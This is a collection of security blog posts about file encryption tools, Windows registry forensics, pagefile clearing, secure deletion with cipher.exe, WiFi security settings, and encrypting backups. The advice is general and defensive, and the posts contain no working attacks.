Encryption

FAA Gives PKWare’s SecureZip Stamp of Approval

It doesn’t surprise me that the inventor of the ZIP file format was recently awarded a large enterprise
software license and maintenance agreement from the Federal Aviation Administration (FAA). What does surprise me is that with my network of security news sources, I hadn’t heard about this product before now.  Granted, I’m mostly an Open Source guy and SecureZIP is commercial software ($39.95 for a single-user license), but I was asleep on this one.

PKWARE’s SecureZIP software will initially be deployed across 50,000 Microsoft Windows® desktops
at the FAA and Department of Transportation (DOT).

I like the way SecureZIP leverages PKI. It enables users to secure files and folders with strong passphrase or digital certificate-based encryption. It also supports digital signatures to ensure data integrity. SecureZIP makes acquiring and using a digital certifcate simple: Upon installation, SecureZIP will automatically request and install (if desired) a digital certifcate from Comodo.

I like AxCrypt and have been using it for quite some time for simple security. AxCrypt doesn’t offer compression, however, so you have to create an archive first, then encrypt it. Moreover, you can’t use certificates or employ digital signatures. SecureZIP is a clear winner for robust security with compression.

I’m headed over there right now to get an evaluation version.

How to Use the Windows Registry for Cyber Forensics: Part 2

In Part 1 of this series, I introduced you to the concept of date/time coincidence and we explored five registry keys that are useful to the forensic examiner. This time, I’ll show you how data can be encrypted and hidden in the registry.

If you’re involved in data security, you’re familiar with cryptography in some fashion and you know that ciphers - algorithms for performing encryption and decryption - are what do the work. You probably also know that there are a few quick-and-dirty algorithms for encrypting data. One such algorithm is known as the Caesar Cipher, or ROT-13, a simple algorithm that encrypts data by shifting each character 13 places in the alphabet while leaving non-alpha characters untouched. It’s so simple that you can decrypt it manually, but it’s enough to fool the casual observer. Anyone coming across something like cnffj beqsb egurf rperg svyrf vfcnf fjbeq, is naturally going to assume it’s encrypted; in fact, it’s ROT-13 for password for the secret files is password. I broke it up into five-character groups to make it more convincing.

For whatever reason, Microsoft uses ROT-13 to encrypt data in some registry keys. One such key is: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist. Here’s an example: “HRZR_EHACNGU:P:\AFYBBXHC.RKR.” Decrypted, that’s “UEME_RUNPATH:C:\NSLOOKUP.EXE.” (We’ll look at the UserAssist key in Part 3.) A better way to hide data is to encode text-based information in binary format and store it in binary form as a string in registry values of type REG_SZ. Given that binary data is common in the registry, the technique would make it extremely difficult to retrieve the hidden information.

In addition to using ROT-13 and binary encoding to obfuscate data, a suspect could take advantage of a flaw in the registry editor to also make the data invisible to anyone but a forensics examiner who knows about the flaw. From “Forensic Analysis of the Windows Registry:”

The Windows 2000 and XP Registry Editor (regedit.exe or regedt32.exe) have an implementation flaw that allows hiding of registry information from viewing and editing, regardless of users access privilege (Secunia, 2005). The flaw involves any registry values with name from 256 to 259 (maximum value name) characters long. The overly long registry value (regardless of type) not only hides its own presence, but also subsequently created values (regardless of type) in the same key (Franchuk, 2005). The editor stops displaying the remaining of the values thinking the overly long value as the last value in that key. Suspect could exploit such Registry Editor flaw to hide information.

The Windows console registry tool (reg.exe) can display these overly long registry values so the hidden data can be recovered as evidence; however, given the sheer number of entries in the registry, this process is not trivial.

I hope this series is giving you some insight, perhaps even piqueing your interest, in cyber forensics. Hit the comment button and tell me what you think.

In Part 3, we’ll explore some keys that can tell us where a suspect has been storing files.

Pagefile.sys is a Security Risk

Since the early days of Windows (3.x and forward), the operating system has relied upon vritual memory in the form of files stored on the hard drive to compensate for the lack of a machine’s physical memory. When the machine’s physical memory begins filling up, pages of data are moved from physical memory to the virtual memory file. Until Windows NT, this file was called win386.swp; when NT came along, it was renamed to pagefile.sys. While the pagefile generally enhances performance, it’s a security risk.

For one thing, Windows’ default behavior leaves the pagefile intact when a user logs out, so there’s a good chance of viewing information in any files the user opened while logged in.

Encryption doesn’t necessarily mean the data is safe, either. Sure, the file itself is encrypted, but in order to work with encrypted files, the system must first decrypt them and this unencrypted copy may be stored in the pagefile.

There’s a simple registry setting that will clear your pagefile when you shutdown your computer. Why this setting isn’t enabled by default only makes sense from a performance standpoint. It may take Windows slightly longer to shut down, but you’ll rest easier knowing your confidential data isn’t at risk.

Start regedit and navigate to:

HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\SESSIONMANAGER\MEMORYMANAGEMENT

Set the key ClearPageFileAtShutdown to 1

Close regedit and reboot your computer to apply the change.

Another Little Known Tool to Securely Delete Files, Folders, and Volumes

Why, all of a sudden, is everyone concerned about secure file deletion? I hesitate to say it’s a sign of the poor economy, but perhaps people consider it even more important to protect their personal information when the idea of losing control of their assets—and their lives–through the incompetence of corporate “managers” and well-intentioned but clueless politicians is more abhorrent than losing control through the outright thievery of Internet gangs. It’s weird. I harped on people about securing their data all along and mostly, my advice fell on deaf ears. Now people are worried. And it’s not because they see more spam email phishing attempts, it’s because they feel they can’t trust anyone anymore, not their formerly respected captains of industry, and certainly not their elected officials.

But, I digress. This post is about security tools, not politics, so I’m now officially off of my soapbox.

I recently posted an article about SDelete, a tool that can be used to securely delete files and folders on a hard drive. There’s another little known, useful tool that has been built into the OS since Windows 2000: cipher.exe. Microsoft provides the following in Knowledge Base article 315672:

How to Use the Cipher Security Tool to Overwrite Deleted Data

To overwrite deleted data on a volume by using Cipher.exe, use the /w switch with the cipher command. Use the following steps:

1. Quit all programs.
2. Click Start, click Run, type cmd, and then press ENTER.
3. Type cipher /w:driveletter:\foldername, and then press ENTER. Specify the drive and the folder that identifies the volume that contains the deleted data that you want to overwrite. Data that is not allocated to files or folders will be overwritten. This permanently removes the data. This can take a long time if you are overwriting a large space.

One more tool you can use to mollify your paranoid clients.

Software for Secure Computing: Easy Email & File Security with AxCrypt

Most of the email we send and receive from our co-workers, family, and businesses contains little that requires any degree of confidentiality. The same goes for most of the files we have stored on our hard drives and thumb drives. Occasionally, however, we need to pass on or store some information that wouldn’t be prudent for us to send or store in clear text, i.e., unencrypted. To go through all of the effort (and it’s a bit of effort, believe me) to set up secure email or create encrypted partitions or directories on the hard drive is a waste of time for most people. Fortunately, there’s a simple, free solution: AxCrypt.

AxCrypt is open source file encryption software for Windows. It integrates seamlessly with Windows to encrypt, decrypt, store, send and work with individual files. It runs on Windows 2000/2003/XP/Vista and uses AES-128 encryption.

Once installed, AxCrypt is integrated into Windows Explorer’s context menu. You simply right-click files and folders in Windows Explorer, select AxCrypt and then select the action you want from the sub-menu (see screen shot). If you choose Encrypt Copy to .EXE, AxCrypt makes a copy of the document, asks you for a passphrase, and creates a standalone, self-decrypting file that you can safely send across the network or store anywhere you choose.

To use AxCrypt for secure email, simply create a text file that contains all of the sensitive information you want to send, make a self-decrypting EXE file, and send it as an attachment. You’ll have to make contact with the recipient off-line to give them the passphrase, but your information will be secure in transit.

The AxCrypt site has plenty of information on how to use the program, as well as an excellent FAQ and command line reference.

Check it out. It’s a great addition to your secure computing software collection.

Software for Secure Computing: Ironkey

There’s an old saw in security circles: “complexity is the enemy of security.” The more complex something is, the more likely there will be flaws to exploit. Too, there are times when you just don’t need the strength of AES encryption. Case in point: the company I work for utilizes a practice management and documentation system to keep track of service tickets, inventory, server & network configurations, and other customer information. Since the software is web-based (which makes it a potential attack target),  we needed a simple method to securely store client passwords and remote access configurations. The solution was Iron Key (not to be confused with the secure flash drive of the same name), a free version of Silver Key–a program for creating self-extracting encrypted files.

The program is perfect for safely sending files over the Internet, even those that contain sensitive personal and financial information. For example, say you have an electronic copy of your tax return that you need to email to your accountant; easy, just drag and drop it onto Iron Key, set a good passphrase and send it along. Your accountant does not need any cryptographic software in order to decrypt the file; all he needs is to run the file and enter the right password, which you can tell him over the phone.

It doesn’t get much simpler than this.

The #1 Security Priority: Protect The Information

SANS recently reported that a Ponemon Institute survey, commissioned by Dell, found that more than 630,000 laptops are lost at airports each year, usually at security checkpoints and departure gates. A staggering 67% of them are never recovered. From SANS NewsBites Vol. 10, Num. 52:

The survey…included feedback from 864 business travelers: 53% said their laptops held confidential data; 42% said their data was not backed up; 16% said they would do nothing if they lost a laptop while traveling on business; 77% said the chance of recovering a lost laptop was less than ten percent.

Surprisingly, the SANS article made no mention that the Ponemon survey found that 65% of the travelers who have confidential or sensitive information on their laptops do nothing to attempt to protect it. The article seems to be more focused on physical security and this is indicative of a paradigm that is too heavily weighted in favor of protecting the network rather than the information traveling across it. The paradigm is shifting, but not nearly fast enough, as the survey shows.

Given the nature of operating systems and software, embedded or otherwise, there will never be a completely secure network; there will always be vulnerabilities to deal with and deal with them we must. However, the Internet is designed for sharing, not securing, a fact that’s never been more true than it is today;  with Web 2.0’s emphasis on community and collaboration, the need to protect the information is even more critical.

We can’t predict security vulnerabilities in third party software and systems, so all we can do is patch after the fact. If we make data protection the first priority and never allow a scrap of sensitive information to reside anywhere on any storage medium without it first having been encrypted or physically isolated, the severity of any newly-discovered vulnerability is greatly lessened.

What do you think?

Virtual Safe Deposit Box?

A bank safe deposit box, securely stored in a vault behind several feet of concrete on five sides with a virtually impenetrable combination-and-time-lock-protected door on the sixth side, is about as safe a storage place as you can get for your cash, gold, jewels, important documents, and other valuables. You rarely hear of anyone losing valuables from a safe deposit box, but there’s an almost daily news story about sensitive data being lost or stolen. This makes for an interesting thought experiment.

While it’s not possible to provide the physical security of a bank vault on a laptop or other portable storage device, it is possible to protect the information itself with encryption so that only authorized persons can access it.  Take the bank’s physical security out of the mix for a moment, making it possible for someone to walk right into the vault; they still can’t unlock your box without access to the bank’s key and your key. Similarly, encryption requires two keys: the encryption key and a passphrase; without both, the encrypted volume won’t open.

One could say, therefore, that an encrypted volume is a virtual safe deposit box for your valuable data.

WiFi Security–The Only Way is WPA

Please note: since this article was posted, WPA-TKIP has been found to be vulnerable. See my post of 2008.11.13 entitled “WPA-TKIP Vulnerable to Attack” for more information.

It’s far too easy to set up WiFi for your home or business; all you have to do is go to your local electronics superstore and pick up a wireless router, plug it in to your network, and connect to it. The default configuration of most consumer products–completely open with no security enabled–will allow you to connect without having to enter any configuration information into your wireless PC. That’s why in any given neighborhood you’ll see multiple unsecured wireless network connections available. Most public WiFi hotstpots are also unsecured, open connections. If you just surf the web and send an occasional email, you might be OK (besides the fact that anyone in range can connect to and use your Internet connection), but the moment you start using your PC for banking, making purchases, and paying bills online, that wireless connection absolutely must be secured. It must be done right, and there’s really only one right way to do it. Before I explain that, let me tell you what not to do:

1. Don’t rely on SSID hiding. I’ve seen numerous articles that tout SSID hiding as a security measure (and one CISSP, no less, is recommending it!) While this technique may serve to hide your network from casual view, there’s nothing secure about it: the SSID is transmitted in clear text in every packet and is easily sniffed by wireless packet sniffers. For example, Network Stumbler will identify the SSIDs of any network within range, regardless of whether or not the wireless access points are broadcasting.

2. WEP is broken. Using 40,000 to 100,000 packets, which can be captured in about a minute, you can crack a WEP key in about three seconds on a Pentium M 1.7 GHz PC. Don’t believe me? Check it out: This list even provides video tutorials on how to do it. Sure, it provides a small measure of security and it’s better than nothing, but why use something that’s already been proven inferior? Would you feel more secure knowing the garage where your store that vintage Corvette is protected by a Master lock or one you bought at an everything-for-a-dollar store? Your personal information is much more valuable than that car.

3. Don’t bother with MAC address filtering . I don’t know why so many people are recommending this. MAC address filtering is equivalent to SSID hiding–it’s virtually useless, except to keep a casual user from inadvertently connecting to your wireless network. Like the SSID, MAC addresses are sent in clear text within the network packets and can easily be discovered and spoofed by anyone sniffing your network.

So, what’s the right way? WiFi Protected Access, known by its acronym, WPA. There are two versions: WPA-Personal and WPA-Enterprise. WPA-Personal relies on a pre-shared key (PSK), while WPA-Enterprise requires a special authentication server and is therefore more suited to corporate environments. WPA implements 128-bit encryption and as long as you create a strong, unguessable passphrase, it’s completely secure. Configuring WPA-PSK on a given wireless router depends on the brand, but you can find a general tutorial at this site.

And that, my dear reader, is Maxim #13 in the How to Secure Your Computer series of articles:

When it comes to securing a WiFi network, the only way is WPA.

How to Secure Your Computer: Maxim #10

A friend of mine came up to me the other day and said, “I love your computer security maxims, but there’s one thing I don’t have anything to worry about–I keep all of my passwords stored on an encrypted thumb drive.”

“Well, that’s a good thing,” I said. “Where do you keep your backups?”

“On my external USB drive.”

“That’s encrypted, right?”

He blinked and looked away. “No.”

Doh! If a cracker is able to access his PC and that drive is connected and turned on, my friend could be toast. If someone breaks into his house and steals the drive, my friend could be toast. Depending on what is actually stored on the hard drive, full backups can contain lots of personal information–information that is much more valuable than mere passwords. Think about it: if you have the user’s name, address, SSN, pet photos, you-name-it, you’re in Fat City; you can easily assume the identity and recover usernames and passwords.

Few people encrypt their data, much less their backups. They should, but they don’t. Some backup programs allow you to make encrypted backups. If this option is available take advantage of it. The most secure plan would be to both encrypt your data and encrypt the backup for a double layer of protection. Then, take the backup media offline and store it in a secure place. And that is Maxim #10:

When using external removable media for backups, either encrypt the backup files or make sure the media is taken offline after the backup has been completed.